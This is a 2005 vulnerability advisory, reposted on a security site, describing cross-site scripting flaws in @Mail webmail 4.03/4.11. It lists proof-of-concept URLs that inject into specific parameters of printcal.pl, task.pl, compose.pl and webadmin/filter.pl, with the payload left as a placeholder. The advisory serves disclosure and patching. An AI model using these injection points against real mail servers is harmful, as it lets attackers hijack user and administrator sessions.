Ê×Ò³ | °²È«ÎÄÕ | °²È«¹¤¾ß | Exploits | ±¾Õ¾Ô­´´ | ¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | °²È«ÂÛ̳
  µ±Ç°Î»ÖãºÖ÷Ò³>°²È«ÎÄÕÂ>ÎÄÕÂ×ÊÁÏ>Exploits>ÎÄÕÂÄÚÈÝ
@Mail multiple variable cross-site scripting
À´Ô´£ºhttp://lostmon.blogspot.com/2005/07/ ×÷Õߣºlostmon ·¢²¼Ê±¼ä£º2005-07-30  

#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
##############################################


@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)


@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

it is also posible other versions are vulnerable.


#################
Timeline
#################

Discovered:2-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005


##################
Proof of comcepts
##################

For exploit this flaws, need a clientlogin and for exploiting
all flaws in /webadmin/ need a admin login.

###################
princal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4

http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]

http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]


http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1

######################## €nd ##########################

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....




 
[ÍƼö] [ÆÀÂÛ(0Ìõ)] [·µ»Ø¶¥²¿] [´òÓ¡±¾Ò³] [¹Ø±Õ´°¿Ú]  
ÄäÃûÆÀÂÛ
ÆÀÂÛÄÚÈÝ£º(²»Äܳ¬¹ý250×Ö£¬ÐèÉóºËºó²Å»á¹«²¼£¬Çë×Ô¾õ×ñÊØ»¥ÁªÍøÏà¹ØÕþ²ß·¨¹æ¡£
 ¡ì×îÐÂÆÀÂÛ£º
  ÈȵãÎÄÕÂ
¡¤CVE-2012-0217 Intel sysret exp
¡¤Linux Kernel 2.6.32 Local Root
¡¤Array Networks vxAG / xAPV Pri
¡¤Novell NetIQ Privileged User M
¡¤Array Networks vAPV / vxAG Cod
¡¤Excel SLYK Format Parsing Buff
¡¤PhpInclude.Worm - PHP Scripts
¡¤Apache 2.2.0 - 2.2.11 Remote e
¡¤VideoScript 3.0 <= 4.0.1.50 Of
¡¤Yahoo! Messenger Webcam 8.1 Ac
¡¤Family Connections <= 1.8.2 Re
¡¤Joomla Component EasyBook 1.1
  Ïà¹ØÎÄÕÂ
¡¤SQL Injection in Product Cart
¡¤CA BrightStor ARCserve Backup
¡¤FtpLocate Command Execution
¡¤CA BrightStor ARCserve Backup
¡¤FTPshell Server DoS
¡¤Ethereal 10.x AFP Protocol Dis
¡¤SlimFTPd RNFR Buffer Overflow
¡¤nbSMTP <= 0.99 util.c Clien
¡¤Netquery Command Execution
¡¤Veritas Backup Exec For Window
¡¤Stealth Background Process
¡¤CA BrightStor ARCserve Backup
  ÍƼö¹ã¸æ
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved